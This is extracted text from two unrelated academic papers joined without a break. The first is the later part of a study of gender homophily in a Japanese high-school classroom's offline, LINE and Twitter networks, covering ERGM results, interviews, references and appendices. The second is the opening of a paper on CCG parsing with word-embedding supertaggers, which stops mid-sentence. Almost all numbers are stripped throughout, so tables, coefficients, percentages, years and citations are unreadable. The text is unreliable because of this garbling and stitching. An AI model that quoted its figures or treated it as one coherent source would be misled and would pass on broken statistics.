it was not possible to determine on which sns five ties were formed, but the others interacted on twitter. in order to focus on one sns mechanism, i excluded those ties from the analysis and examined the social network on twitter only. in this study, both networks that contained full nodes of the classroom and only nodes that used services were considered. table shows basic network statistics. the edge counts shown in table depict the numbers after the aforementioned manipulation. in the parentheses, i reported the statistics of networks that contained only nodes that used the services. note that isolated nodes in the online social network may actively connect to users outside the classroom. network density is the value of the observed tie count divided by all possible tie counts given the number of nodes, and it indicates the level of interaction activity within the network. this index was highest in the f f network compared to im and sns networks, and the latter two were relatively similar across both waves. additionally, the average degree of all nodes, those of only male nodes, and those of only female nodes are shown for both waves. although in the f f and sns network, the average degree of male nodes is greater than that of females, in the im network, the average degree of female nodes is greater than that of males. this may indicate that female students interact with other students by im more actively than male students, whereas male students are more active in the f f and sns network. preliminarily, i compare the strength of gender segregation by the e-i index (krackhardt and stern, ). the e-i index is formulated as (el − il)/(el + il), where el is the number of external (inter-gender) links and il is the number of internal (intra-gender) links. the range of this index is − . (all links are internal) to . (all links are external). in the wave data, the index is the lowest (most strongly gender-segregated) in the f f network, and the second lowest is the im network. however, in the sns network, the index is negative, but approximately . in the wave data, the index of the im network increased to approximately and almost the same level of the sns network, which means that the proportion of inter-gender ties in the im network increased in three months. ergm in figure , the points show the coefficients of gender homophily, and the horizontal bars show % table . descriptive statistics of students. dimension attribute frequency gender male female club activity members members member academic course literature science im (line) registered not registered sns registered (twitter) (facebook) (google+) (instagram) (other) not registered total nodes gender homophily in multilayer media social networks confidence intervals of the ergm on each network layer. in table , all the parameters are shown in table form. see appendix a for the information on the goodness of fit. the positive effects of gender homophily are depicted in the f f network across waves. below, i discuss the main findings of the hypotheses. first, in the sns network, no gender homophily effect could be observed, and the coefficients are lower than those of the f f networks. although the % ci of the sns network with only users in wave overlapped little with that of the f f network in the same wave, the estimated coefficient is almost the same as that of the sns network with all students. this result suggests that, given the same node set, even after controlling for other network formation mechanisms, gender homophily operated more weakly in the sns network layer than in the f f network layer, as hypothesized in hypothesis a. second, whereas in wave data, the coefficients of gender homophily in the im networks were positive and statistically significant, in the wave data, gender homophily in the im network layer could not be observed at all, as with the sns network. this result means that hypothesis b is partially supported. on the one hand, the wave results were not concurrent with the hypothesis but, on the other hand, three months later in the wave data, gender homophily was reduced to the same degree as that of the sns network and demonstrated a significant difference from the f f network, as hypothesized in hypothesis b. third, although the estimated coefficients of the im network were more positive than those of the sns network in the wave data, the difference was not statistically significant. on the contrary, as previously mentioned, gender homophily effects could not be observed at all in the wave data, as in the sns network layer. this result indicates that hypothesis is not supported. however, it is remarkable that at first, im had a weak positive effect of homophily that disappeared within three months. additionally, the foci effects of club activities were high in every layer, and this mechanism was robust among various network layers. this suggests that we cannot ignore real-world social institutions when considering the mechanisms for not only offline networks but also online networks. at the same time, the data showed no effect of academic courses on any network layer except f f. this means that students were not connected to each other online table . network statistics. index f f im sns (wave ) node count ( ) ( ) edge count ( ) ( ) density . . ( . ) . ( . ) average degree (all) . . ( . ) . ( . ) average degree (male) . ( ) . ( . ) average degree (female) . . ( . ) . ( . ) e-i index − . − . (− . ) − . (− . ) (wave ) node count ( ) ( ) edge count ( ) ( ) density . . ( . ) . ( . ) average degree (all) . . ( . ) . ( . ) average degree (male) . . ( . ) . ( . ) average degree (female) . . ( ) . ( . ) e-i index − . − . (− . ) ( ) connections figure : estimated coefficients of gender homophily by ergm (horizontal bars are % cis). simply because they were in the same classes. these results were robust across waves. the triadic closure effect was observed on every network layer and waves. this means that all the networks tended toward triadic closure, even after controlling for nodal attributes such as gender. in other words, in these network layers, friends of friends were likely to be connected to each other. it is worth noting that in the wave data, although the difference was not statistically significant, the sns (and sns without non-users) network was the most transitive network among all layers. however, this tendency for triad closure in the sns was weaker in wave . in appendix b, i discuss the difference in the strength of gender homophily separately for each gender. semi-structured interviews table summarizes the attributes of the interviewees from the semi-structured interviews. when selecting subjects, i chose not to bias the gender, academic course, affiliation to club activities, or media usage of the interviewees who were able to schedule interviews during the limited time period available for interviews. at the time of the interviews, in order to avoid students’ attrition, their narratives were not recorded electronically; i simply wrote them in field notes during the interviews. interviewees’ narratives in this article were reconstructed from field notes, and names were alphabetized from a to g (see table ) to identify who said what in the quotes in the following discussion. gender homophily in multilayer media social networks table . all estimated coefficients of ergms. f f im im(users only) sns sns(users only) wave edges − . *** − . *** − . *** − . *** − . *** ( . ) ( . ) ( . ) ( . ) ( . ) homophily (gender) . *** . * . * . . ( . ) ( . ) ( . ) ( . ) ( . ) foci (academic course) . * . . − . − . ( . ) ( . ) ( . ) ( . ) ( . ) foci (club activity) . *** . *** . *** . *** . *** ( . ) ( . ) ( . ) ( . ) ( . ) gwesp . *** . * . * . *** . *** ( . ) ( . ) ( . ) ( . ) ( . ) aic . . . . . bic . . . . . log likelihood − . − . − . − . − . wave edges − . *** − . *** − . *** − . *** − . *** ( . ) ( . ) ( . ) ( . ) ( . ) homophily (gender) . *** − . − . − . − . ( . ) ( . ) ( . ) ( . ) ( . ) foci (academic course) . * . . . . ( . ) ( . ) ( . ) ( . ) ( . ) foci (club activity) . *** . *** . *** . ** . ** ( . ) ( . ) ( . ) ( . ) ( . ) gwesp . *** . *** . *** . *** . ** ( . ) ( . ) ( . ) ( . ) ( . ) aic . . . . . bic . . . . . log likelihood − . − . − . − . − . notes: decay parameter of gwesp (alpha) is set to . (f f), . (im), . (sns). *p < . ; **p < . ; ***p < . . practices on im (line) regarding interaction on im, belonging to the same club was recognized as one of the most important factors in forming a relationship. student d reported: ‘i use line with people who belong to the same club activity.’ students reported that im was mainly used as a tool for conveying information about club activities, as student d added: ‘i mainly use it for business communication, not chatting. i often use im for club activities, but i am not an active user in this classroom.’ as another example, student c said: ‘in one-on-one communication, i just talk with people in the same group activity to discuss topics that are inconvenient to talk about in reality, such as deciding on a birthday gift for the teacher.’ one-on-one im connections communication with classmates was also used for communication regarding classroom affairs. moreover, ‘arrangement of seats’ or a ‘common hobby’, such as playing videogames, were key factors in cultivating relationships between students, which was not considered in the quantitative study. regarding the ‘arrangement of seats,’ student d said: ‘i don’t have many personal talks, but if any, i send a picture of the class board. i do not talk much, but i often talk to people in the same class who are seated close to me.’ regarding the importance of a common hobby, student f said, ‘when it comes to one-on- one communication, i often talk about videogames with people in my class on line.’ this indicates that ‘hobby homophily’ also operates in the im network. however, how do students begin interacting with im? when it comes to friending, students are reluctant to register other students as friends without experiencing the f f interaction. for example, student d said, ‘i am not the type who adds friends myself. people i have not met in real life do not become my friends. i only accept a request if it is sent from another person’. she added, ‘not many people interact with me through line alone; i do not register people as friends if i have never spoken to them’ there is a process through which f f communication takes place first, followed by friend registration, and then message exchanges on im. this may be the reason the homophily mechanisms of the f f network and the im network in its early stage are relatively consistent compared to the sns network. practices on snss (twitter) the results of the semi-structured interview suggested that in the sns network, as well as the im network, ‘hobby’ was the main topic of conversations, and if students had a common hobby, they were still likely to follow each other even if they did not talk in reality. for example, student a said: ‘some people talk about their hobbies on line with the same high school people they met on twitter. sometimes they meet on twitter and then talk on line.’ as another example, student f reported: ‘i often talk about my hobbies with people on twitter. if it is not a protected account, and if i think my hobbies are going to match, i think a person is safe and even people who do not know me may follow me. some people have conversations about hobbies on twitter and then actually get along in real life.’ after discussing their hobbies on twitter, students began talking on im or in real life, thus deepening their friendships. unlike im, students do not necessarily follow users on snss after meeting them in the real world. thus far, it has been revealed that, following sns networks did not necessarily require offline communication, the exchange of contacts through im often originated in face-to-face communication. therefore, it can be inferred that network formation mechanisms in the im network are more consistent with the f f network than the sns network in its early stage. the ergm results of the im network in wave showed weak gender homophily effects, but no effects were shown in wave . this means that in wave , which was conducted about two months after the students were assigned to a new class, the im network was more consistent with the f f network than in wave . the effects of gender homophily vanished in wave . therefore, it can be assumed that social interactions in the im network became independent from the earlier f f network in three months. table . information of sampled participants. name gender academic course club activity register im (line)? register sns (twitter)? a female science culture yes yes b male literature culture yes no c male science culture yes no d female literature sports yes yes e male science sports yes no f male science culture yes yes g male science sports yes yes gender homophily in multilayer media social networks furthermore, regarding snss, it was suggested that functions such as the ‘retweet’ or ‘recommended users’ induce relationships between students in the classroom. student a said: ‘although we have never actually spoken, sometimes a friend retweets another friend’s tweet and i follow, knowing that the person is in the same class as me’. student g also said: ‘users who belong to the same class are usually shown as ‘recommended users’ on twitter. i do not necessarily follow after getting acquainted with them in reality.’ if students cannot identify whom an account be- longs to in a class, they ask someone they know. student d said: ‘i sometimes ask my friends who a certain account belongs to. the recommendation function can tell you that you are in the same class.’ as previously explained, on snss, ‘belonging to the same classroom’ becomes a similar group identity, and social ties may emerge regardless of gender, assisted by the functions built into the platform. in the previous section, the ergm result showed that the effect of triad closure on twitter was higher than that on other network layers, which was likely caused by such technical factors. discussion and conclusion thus far, i have compared the strength of gender homophily among various media network layers. first, hypothesis a: in the sns social network layer, gender homophily operates more weakly than in the offline social network layer was supported. even when other networking mechanisms were controlled, the ergm showed no gender homophily mechanism in snss. however, there was a clear difference in the strength of homophily between f f and sns networks. whereas the gender homophily mechanism operated strongly in the f f network, no such effect could be observed in the sns network. this difference was statistically significant, given the same node set as the f f network. hypothesis b: in the im social network layer, gender homophily operates more weakly than in the offline social network layer was only partially supported. whereas the coefficients of gender homophily in the im networks were positive and statistically significant in the wave data, no gender homophily was observed at all in the im network layer in the wave data, as in the sns network. the qualitative research indicated that this was caused by the differences in the process of friending between im and snss. whereas f f contact did not necessarily precede friending in the sns networks, the exchange of contacts in im often originated in f f communication. this can be interpreted as follows: since network formation in the im network layer required f f contact, the im network was consistent with the f f network in the early stages. however, communication in im became independent from f f and the gender homophily effects also disappeared in three months. third, hypothesis : in the sns social network layers, gender homophily operates more weakly than in the im social network layers was not supported. however, it was remarkable that, at first, im had a weak homophily effect and vanished within three months. these results show that, regarding multiplex- media networks, social networks on online media are more likely to be heterophilic than those in the offline space, even though im had a weak but positive gender homophily effect at first. from the qualitative research, some practices or social contexts of communication media were specified that could explain the results of the quantitative analysis. table depicts the diffe- rence between im and snss in terms of gender homophily and its formation process. triggered table . summarization of the gender homophily effects of im and sns networks and their formation principles. media gender homophily formation principles im weak positive (wave ) f f communication preceded friending none (wave ) hobby homophily sns none (wave ) f f communication did not necessarily precede following none (wave ) ‘retweet’ or ‘recommended users’ induced social ties hobby homophily connections by the characteristic functions on twitter such as ‘retweeting’ or ‘recommended users,’ once students identified a user as being ‘in the same classroom’ or having a ‘common hobby,’ they connected with each other. the relative weakness of gender homophily in the online networks could be explained by not only the foci mechanism of ‘classroom membership’ but also ‘hobby homophily.’ these factors canceled out the gender homophily effects. these findings can also be explained in terms of ‘multidimensional homophily’ (block and grund, ). according to block and grund ( ), homophily effects can be strongly observed; however, the interaction para- meter of sex and some other dimensions is less likely to occur. simply put, homophily is likely to occur in one dimension but not in two or more dimensions. from this perspective, the result implies that multidimensional matching of both cultural tastes and gender is less likely to occur. overall, this study implies that considering offline or online space alone may cause misunderstanding regarding homophily because the observed stre- ngth of homophily effects depends on whether the space is examined offline or online. in addition, how heterogeneous the online connections depend on what kind of online media is investigated and when social network data are collected, as it is indicated that im is gender homophilous in the early stage of the classroom, but becomes less homophilous three months later. this suggests that studies about homophily in an organization based on online connection data have to be careful of the characteristics and practical usages of online media. or, more discussion about what is the ‘actual’ homophily needed; is it an online network, an offline network, or a network merging these networks together? regarding hypothesis a, no gender homophily effect was observed in either wave in the sns network, although the difference with the im network was not significant. this may indicate that, in the sns network, the group identity of being part of the ‘same classroom’ played a key role in network formation. f f communication did not necessarily precede friending in the sns. students encounter one another online through ‘recommended users’ or ‘retweeting’ in a platform that contains many strangers who are not members of their class. this feature of snss may enhance the situated group identity of being ‘classmates’ for students, which can lead a connection on the sns to be more gender heterogeneous even though the students might have never spoken in the offline classroom. however, this result indicates that network formation on snss at least partially depends on the recommendation algorithms. therefore, the relative weakness of gender homophily on snss could be lost if there is a change in the architecture of the services. online social networks are important because they generate ‘latent ties’ (haythornthwaite, ), in which otherwise disconnected people are connected through electronic communication media. although it is impossible to predict whether these connections will become a ‘real’ social network, these latent ties connect dissimilar people. future research must trace social ties online and examine whether they emerge offline. limitations there are some limitations to the present study. first, since this study was a case study of a single high school classroom, connections that occurred outside of the class (e.g., within the whole school) could not be considered. in the future, it will be necessary to verify the hypothesis in a group that includes more social actors. second, in this study, only gender homophily was considered. however, it is necessary to examine how the strength of homophily offline and online differs in other social dimensions, such as age and political attitude. third, this study did not track real interactions in the online world. students were merely asked about their interactions via a questionnaire. many students’ accounts on twitter were set to private. as a result, it was difficult to obtain matches between offline and online identities and agreements with respondents. students answered each question based on their memory and estimation of their behavior across these media. i did not observe how students actually replied to or commented on online posts or communicated f f. therefore, they may have provided inaccurate responses regarding the individuals with whom they connected in different settings. moreover, respondents may have felt shy and underreported their f f cross-gender relation ships if there was a norm that constrained cross-gender interactions in their classroom. fourth, the dataset used in this research lacked specification regarding the strength or type of social ties. this raises the question: are those ties strong or weak, and are they friendships or romantic rela- tionships? the latter difference is a unique point in gender homophily. in a survey of japanese high school students, . % of male students and . % of female students reported that they had dated before (takehara et al., ). therefore, gender homophily in multilayer media social networks cross-gender ties in this study could have included romantic partnerships. information on the nature of social ties would help reveal what types of norms are alleviated by online space. for instance, if these ties were friendships, it could be supposed that there is a norm that constrains cross-gender friendships in the classroom. future research should address this issue. finally, this study only targeted second-grade high school students. it is known that the effects of homophily change with age (shrum et al., ; laniado et al., ), and the difference between offline and online homophily can decrease or disappear. future studies should consider broadening the age range. acknowledgments this research received a grant from gushinkai foundation, - (representative: naoki maejima). references barlow, j. p. . declaration of independence for cyberspace, available at: https://www.eff.org/cyberspace- independence. baym, n. k. and ledbetter, a. . tunes that bind? predicting friendship strength in a music-based social network. information, communication & society : – . block, p. and grund, t. . multidimensional homophily in friendship networks. network science : – . booth, a. and hess, e. . cross-sex friendship. journal of marriage and the family : – . borgatti, s. p. and molina, j. . toward ethical guidelines for network research in organizations. social networks : – . boyd, d. m. . taken out of context: american teen sociality in networked publics. phd dissertation, university of california, berkeley, ca. boyd, d. m. and ellison, n. b. . social network sites: definition, history, and scholarship. journal of computer-mediated communication : – . colleoni, e., rozza, a. and arvidsson, a. . echo chamber or public sphere? predicting political orientation and measuring political homophily in twitter using big data. journal of communication : – . conover, m. d., ratkiewicz, j., francisco, m., gonçalves, b., menczer, f. and flammini, a. . “political polarization on twitter”, proceedings of the fifth international aaai conference on weblogs and social media, barcelona. domínguez, s. and hollstein, b. . mixed methods social networks research: design and applications. cambridge university press, new york, ny. ellison, n. b., steinfield, c. and lampe, c. . the benefits of facebook “friends”: social capital and college students’ use of online social network sites. journal of computer-mediated communication : – . feld, s. . the focused organization of social ties. american journal of sociology : – . feld, s. and grofman, b. . “homophily and the focused organization of ties”, in hedstrom, p. and bearman, p. (eds), the oxford handbook of analytical sociology. oxford university press, new york, ny, – . goodreau, s. m., kitts, j. a. and morris, m. . birds of a feather, or friend of a friend? using exponential random graph models to investigate adolescent social networks. demography : – . hallinan, m. t. and williams, r. a. . interracial friendship choices in secondary schools. american sociological review : – . haythornthwaite, c. . exploring multiplexity: social network structures in a computer-supported distance learning class. the information society : – . haythornthwaite, c. . social networks and internet connectivity effects. information, community & society : – . hristova, d., musolesi, m. and mascolo, c. . “keep your friends close and your facebook friends closer: a multiplex network approach to the analysis of offline and online social ties”, proceedings of the eighth international aaai conference on weblogs and social media, ann arbor, mi. hunter, d. r. . curved exponential family models for social networks. social networks : – . igarashi, t. . “longitudinal changes in face-to- face and text message-mediated friendship networks”, in lusher, d., koskinen, j. and robins, g. (eds), exponential random graph models for social networks: theory, methods and applications. cambridge university press, new york, ny, – . igarashi, t., takai, j. and yoshida, t. . gender differences in social network development via mobile phone text messages: a longitudinal study. journal of social and personal relationships : – . kalmijn, m. . sex segregation of friendship networks. individual and structural determinants of having cross-sex friends. european sociological review : – . kandel, d. b. . homophily, selection, and socialization in adolescent friendships. american journal of sociology : – . kendall, l. . hanging out in the virtual pub: masculinities and relationships online. university of california press, berkeley. connections kiesler, s., siegel, j. and mcguire, t. . social psychological aspects of computer-mediated communication. american psychologist : – . kivelä, m., arenas, a., barthelemy, m., gleeson, j. p., moreno, y. and porter, m. a. . multilayer networks. journal of complex networks : – . krackhardt, d. and stern, r. n. . informal networks and organizational crises: an experimental simulation. social psychology quarterly : – . laniado, d., volkovich, y., kappler, k. and kaltenbrunner, a. . “gender homophily in online dyadic and triadic relationships”, epj data science, . leszczensky, l. and pink, s. . ethnic segregation of friendship networks in school: testing a rational-choice argument of differences in ethnic homophily between classroom-and grade-level networks. social networks : – . mcpherson, m., smith-lovin, l. and cook, j. m. . birds of a feather: homophily in social networks. annual review of sociology : – . mehta, c. m. and strough, j. . sex segregation in friendships and normative contexts across the life span. developmental review : – . meyrowitz, j. . no sense of place: the impact of electronic media on social behavior. oxford university press, new york, ny. moody, j. . race, school integration, and friendship segregation in america. american journal of sociology : – . mouw, t. and entwisle, b. . residential segregation and interracial friendship in schools. american journal of sociology : – . omi, y. . “the potential of the globalization of education in japan: the japanese style of school sports activities (bukatsu)”, in marsico, g., dazzani, v., ristum, m. and de sousa bastos, a. c. (eds), educational contexts and borders through a cultural lens: looking inside, viewing outside, springer, new york, ny, – . parks, m. r. and floyd, k. . making friends in cyberspace. journal of communication : – . parks, m. r. and roberts, l. d. . making moosic’: the development of personal relationships on-line and a comparison to their off-line counterparts. journal of social and personal relationships : – . rheingold, h. . the virtual community: finding connection in a computerized world. addison-wesley longman publishing, boston, ma. robins, g. . doing social network research: network-based research design for social scientists. sage, london. robins, g., pattison, p., kalish, y. and lusher, d. . an introduction to exponential random graph (p*) models for social networks. social networks : – . shrum, w., cheek, n. h. and hunter, s. m. . friendship in school: gender and racial homophily. sociology of education : – . sproull, l. and kiesler, s. . reducing social context cues: electronic mail in organizational communication. management science : – . stehlé, j., charbonnier, f., picard, t., cattuto, c. and barrat, a. . gender homophily from spatial behavior in a primary school: a sociometric study. social networks : – . takehara, k., misago, c. and honda, y. . sexual behavior and sex education needs among high school students. japanese journal of health and human ecology : – . teddlie, c. and tashakkori, a. . a general typology of research designs featuring mixed methods. research in the schools : – . thelwall, m. . homophily in myspace. journal of the american society for information science and technology : – . walther, j. b. . interpersonal effects in computer-mediated interaction: a relational pers- pective. communication research : – . walther, j. b. . computer-mediated commu- nication: impersonal, interpersonal, and hyperpersonal interaction. communication research : – . wimmer, a. and lewis, k. . beyond and below racial homophily: erg models of a friendship network documented on facebook. american journal of sociology : – . appendix a to evaluate the goodness of fit of the ergms, i randomly generated networks from the estimated models and examined whether the model could replicate the observed network features. in figures a (wave ) and a (wave ), i used the following three commonly used structural features: degree distribution, geodesic distance, and edge-wise shared partners. red lines show the frequency of the observed network, whereas the boxplot shows the distribution frequency of the simulated networks. although almost all of the statistics are well replicated, in both waves, the degree distribution of the f f network and distributions of edge-wise shared partners in the f f and sns network are not replicated very well. the simulated distributions are skewed to the right, compared to the observed network. gender homophily in multilayer media social networks figure a : goodness of fit of ergm, comparing structural network statistics (wave ). however, the main interest of the present study is cross-gender connections. in figure a , comparisons of the e-i index between the observed network and the simulated networks are shown. red dots show the value of the observed network, whereas the box plots show the distribution of connections figure a : goodness of fit of ergm, comparing structural network statistics (wave ). the value of the simulated networks. as shown in figure a , the e-i index positions around the median value of simulated networks in every layer and wave, which means that the models can replicate the mixing of gender in the classroom very well. gender homophily in multilayer media social networks figure a : goodness of fit of ergm, comparing e-i index (wave and ). appendix b i also estimated homophily parameters separately for each gender by ergms. the results are shown in figure b . here, the network statistics of (fe)male-(fe) male is defined as the number of edges in which both dyads are (fe)males. in this model, the strength of gender homophily is assumed to be different for each gender. independent variables other than gender homophily are the same as those in the manuscript, however, they are not shown. although estimated coefficients are not significantly different between male and female, there are some findings from their estimated values. first, in both waves, female–female ties are less likely to form than male–male ties in the sns layer. second, female–female ties in the im layer become less homophilous in the wave data. third, in the wave data, male–male homophily became weaker in the f f layer, whereas female–female homophily are still as strong as the wave data. connections figure b : gender homophily parameters estimated separately for male and female by ergm (horizontal bars are % cis). improved ccg parsing with semi-supervised supertagging mike lewis school of informatics university of edinburgh edinburgh, eh ab, uk mike.lewis@ed.ac.uk mark steedman school of informatics university of edinburgh edinburgh, eh ab, uk steedman@inf.ed.ac.uk abstract current supervised parsers are limited by the size of their labelled training data, making improving them with unlabelled data an im- portant goal. we show how a state-of-the- art ccg parser can be enhanced, by pre- dicting lexical categories using unsupervised vector-space embeddings of words. the use of word embeddings enables our model to better generalize from the labelled data, and allows us to accurately assign lexical cate- gories without depending on a pos-tagger. our approach leads to substantial improve- ments in dependency parsing results over the standard supervised ccg parser when evalu- ated on wall street journal ( . %), wikipedia ( . %) and biomedical ( . %) text. we com- pare the performance of two recently proposed approaches for classification using a wide va- riety of word embeddings. we also give a de- tailed error analysis demonstrating where us- ing embeddings outperforms traditional fea- ture sets, and showing how including pos fea- tures can decrease accuracy. introduction combinatory categorial grammar (ccg) is widely used in natural language semantics (bos, ; kwiatkowski et al., ; krishnamurthy and mitchell, ; lewis and steedman, a; lewis and steedman, b; kwiatkowski et al., ), largely because of its direct linkage of syntax and semantics. however, this connection means that performance on semantic applications is highly de- pendent on the quality of the syntactic parse. al- though ccg parsers perform at state-of-the-art lev- els (rimell et al., ; nivre et al., ), full- sentence accuracy is just . % on wikipedia text, which gives a low upper bound on logical inference approaches to question-answering and textual entail- ment. supertags are rich lexical categories that go be- yond pos tags by encoding information about predicate-argument structure. supertagging is “al- most parsing”, and is used by parsers based on strongly lexicalized formalisms such as ccg and tag to improve accuracy and efficiency, by dele- gating many of the parsing decisions to finite-state models (bangalore and joshi, ). a disadvan- tage of this approach is that larger sets of lexical categories mean increased sparsity, decreasing tag- ging accuracy. as large amounts of labelled data are unlikely to be made available, recent work has ex- plored using unlabelled data to improve parser lex- icons (thomforde and steedman, ; deoskar et al., ; deoskar et al., ). however, existing work has failed to improve the overall accuracy of state-of-the-art supervised parsers in-domain. another strand of recent work has explored us- ing unsupervised word embeddings as features in supervised models (turian et al., ; collobert et al., b), largely motivated as a simpler and more general alternative to standard feature sets. we apply similar techniques to ccg supertagging, hypothe- sising that words which are close in the embedding space will have similar supertags. most existing work has focused on flat tagging tasks, and has not produced state-of-the-art results on structured pre- diction tasks like parsing (collobert, ; andreas and klein, ). ccg’s lexicalized nature provides a simple and elegant solution to treating parsing as a flat tagging task, as the lexical categories encode information about hierarchical structure. transactions of the association for computational linguistics, ( ) – . action editor: ryan mcdonald. submitted / ; revised / ; published / . c© association for computational linguistics. as well as improving parsing accuracy, our model has a number of advantages over current ccg pars- ing work. our supertagger does not make use of a pos-tagger, a fact which simplifies the model archi- tecture, reduces the number of parameters, and elim- inates errors caused by a pipeline approach. also, learning word embeddings is an active area of re- search, and future developments may directly lead to better parsing accuracy, with no change required to our model. background . ccg parsing the widely-used c&c parser (clark and curran, ) for ccg takes a pipeline approach, where first sentences are pos-tagged, then supertagged, and then parsed. the supertagger outputs a distri- bution over tags for each word, and a beam is used to aggressively prune supertags to reduce the parser search space. if the parser is unable to find a parse with a given set of supertags, the beam is relaxed. this approach is known as adaptive supertagging. the pipeline approach has two major drawbacks. firstly, the use of a pos-tagger can overly prune the search space for the supertagger. whilst pos- taggers have an accuracy of around % in domain, this drops to just . % on biomedical text (rimell and clark, ), meaning that most sentences will contain an erroneous pos-tag. the supertag- ger model is overly dependent on pos-features—in section . we show that supertagger performance drops dramatically on words which have been as- signed an incorrect pos-tag. secondly, both the pos-tagger and supertagger are highly reliant on lexical features, meaning that performance drops both on unknown words, and words used differently from the training data. many common words do not appear at all in the train- ing data of the penn treebank, such as ten, mili- tants, insight, and teenager. many others are not seen with all their possible uses—for example eu- ropean only occurs as an adjective, never a noun, meaning that the c&c parser is unable to analyse simple sentences like the director of the imf is tra- ditionally a european. these problems are particu- larly acute when parsing other domains (rimell and clark, ). . semi supervised nlp using word embeddings recent work has explored using vector space em- beddings for words as features in supervised mod- els for a variety of tasks, such as pos-tagging, chunking, named-entity recognition, semantic role labelling, and phrase structure parsing (turian et al., ; collobert et al., b; collobert, ; socher et al., ). the major motivation for us- ing these techniques has been to minimize the level of task-specific feature engineering required, as the same feature set can lead to good results on a variety of tasks. performance varies between tasks, but any gains over state-of-the-art traditional features have been small. a variety of techniques have been used for learning such embeddings from large unlabelled corpora, such as neural-network language models. models we introduce models for predicting ccg lexi- cal categories based on vector-space embeddings. the models can then be used to replace the pos- tagging and supertagging stages used by existing ccg parsers. we experiment with the neural net- work model proposed by collobert et al. ( b), and conditional random field (crf) model used by turian et al. ( ). we only use features that can be expected to work well out-of-domain—in particular, we use no lexical or pos features. . features our features are similar to those used by collobert et al. ( b) for pos-tagging. for every word in a context window, we add features for the embedding of the word, its -character suffix, and whether or not it is capitalised. we expect such features to gen- eralize well to other domains—and in section . we show that adding traditional pos-tag and lexical features does not help. to further reduce sparsity, we apply some simple preprocessing techniques. words are lower-cased , and all digits are replaced with . if an unknown word is hyphenated, we first try backing-off to the substring after the hyphen. for embeddings that include separate entries for the same word with different capitalization, we take the most frequently occur- ring version in the unlabelled corpus. colourless green ideas np s\np n context words lookup tables for embeddings and discrete features additional hidden layer output ccg categories figure : collobert et al. ( b)’s window approach network, applied to ccg supertagging. each context word ci is connected to one hidden node per dimension of the embedding eij with weight wij, and ad- ditional hidden nodes representing capitalization and suffix features. the weights wij are initialized using pre-trained word embeddings, but can be modified during supervised training. the additional hidden layer uses a hard-tanh activation function, and the output layer uses a softmax activation function. words which do not have an entry in the word em- beddings share an ‘unknown’ embedding. different ‘unknown’ vectors are used for capitalized and un- capitalized words, and non-alphabetic symbols. we also add entries for context words which are before the start and after the end of the sentence. all of these were initialized to the ‘unknown’ vector in the pre-trained embeddings (or with gaussian noise if not available). . neural network model we predict word supertags with the neural network classifier used by collobert et al. ( b) for pos- tagging, as shown in figure . each feature is imple- mented as a lookup table, which maps context words onto vectors. the same lookup table parameters are used wherever a word appears in the context win- dow. word embeddings are implemented with a lookup table w ∈ rv ×d, where v is the size of the vo- cabulary, and d is the dimension of the word em- beddings. the parameters of the lookup table are initialized using unsupervised embeddings, but are modified during supervised training. as in collobert et al. ( b), non-embedding features ( -character suffixes and capitalization) are also each represented with lookup tables, which map each feature onto a k dimensional vector (as in col- lobert et al. ( b), we use k = ). lookup table parameters for non-embeddings features are initial- ized with gaussian noise. the first hidden layer therefore contains c×(d+ kf) nodes, where f is the number of discrete fea- tures and c is the size of the context window. we also experimented adding an additional hidden layer, with a hard-tanh activation function, which makes the classifier non-linear. finally, a logistic softmax layer is used for classifying output categories. the model is trained using stochastic gradient de- scent, with a learning rate of . , optimizing for cross-entropy. we use early-stopping as an alterna- tive to regularization—after each iteration the model is evaluated for accuracy on held-out data, and we use the best performing model. training was run until performance decreased on held-out data. . crf model the neural network model treats the probability of each supertag as being conditionally independent. however, conditioning on surrounding supertags embeddings model dimensionality training words training domain collobert&weston nnlm m wikipedia skip-gram skip gram b google news turian nnlm , , , m newswire hlbl hlbl , m newswire mikolov rnnlm , m broadcast news table : embeddings used in our experiments. dimensionality is the set of dimensions of the word em- bedding space that we experimented with, and training words refers to the size of the unlabelled corpus the embeddings were trained on. may be very useful—for example, a noun is much more likely to follow an adjective than a verb. cur- ran et al. ( ) report a large improvement using a maximum-entropy markov model for supertagging, conditioned on the surrounding supertags. we follow turian et al. ( ) in using a linear chain crf model for sequence classification using embeddings as features. this model does not al- low supervised training to fine-tune the embeddings, though it would be possible to build a crf/nn hy- brid that enabled this. we use the same feature set as with the neural network model—so the probabil- ity of a category depends on embeddings, capital- ization and suffix features—as well as the previous category. the model is trained using the averaged- perceptron algorithm (collins, ), again using early-stopping based on development data accuracy. experiments . domains we experiment with three domains: • ccgbank (hockenmaier and steedman, ), which is a conversion of the penn tree- bank (marcus et al., ) to ccg. section is used for evaluation. • wikipedia, using the corpus of sentences annotated with ccg derivations by honnibal et al. ( ). as the text is out-of-domain, parsing accuracy drops substantially on this corpus. • biomedical text, which is even less related to the newswire text than wikipedia, due to large numbers of unseen words and different writ- ing styles, causing low parsing accuracy. for parsing experiments, we use the bioinfer cor- pus (pyysalo et al., ) as a test set. for measuring supertagging accuracy, we use the ccg annotation produced by rimell and clark ( ). . neural network model parameters in this section, we explore how adjusting the pa- rameters of our neural network model affects -best lexical category accuracy on the section of ccg- bank (all development was done on this data). the c&c supertagger achieves . % accuracy on this task. the models were trained on sections - of ccgbank, and the reported numbers are the best accuracy achieved on section . as in clark and curran ( ), all models use only the most fre- quent categories in ccgbank. . . embeddings a number of word embeddings have recently been released, aiming to capture a variety of syntactic and semantic phenomena, based on neural network lan- guage models (nnlms) (turian et al., ; col- lobert et al., b), recurrent neural network lan- guage models (mikolov, ), the hierarchical log bilinear model (hlbl) (mnih and hinton, ), and mikolov et al. ( )’s skip gram model. how- ever, there has been a lack of experiments comparing which embeddings provide the most effective fea- tures for downstream tasks. first, we investigated the performance of several publicly available embeddings, to find which was most effective for supertagging. the embeddings we used are summarized in table . for efficiency, we used our simplest architecture, with no additional implemented using the torch library (collobert et al., a) embeddings category accuracy (window= ) category accuracy (window= ) collobert&weston . % . % skip gram . % . % turian- . % . % turian- . % . % turian- . % . % turian- . % . % hlbl- . % . % hlbl- . % . % mikolov- . % . % mikolov- . % . % table : comparison of different embeddings and context windows on section of ccgbank. ab- breviations such as turian- refer to the turian em- beddings with a -dimensional embedding space. hidden layer. we also investigate which size context window is most effective. results are shown in table , and show that the choice of embeddings is crucial to performance on this task. the performance of the turian and hlbl embeddings is surprisingly high given the relatively small amount of unlabelled data, suggesting that pa- rameters other than the size of the corpus are more important. of course, we have not performed a grid- search of the parameter space, and it is possible that other embeddings would perform better with differ- ent training data, dimensionality, or model architec- tures. the mikolov embeddings may suffer from be- ing trained on broadcast news, which has no punc- tuation and different language use. using a context window of words 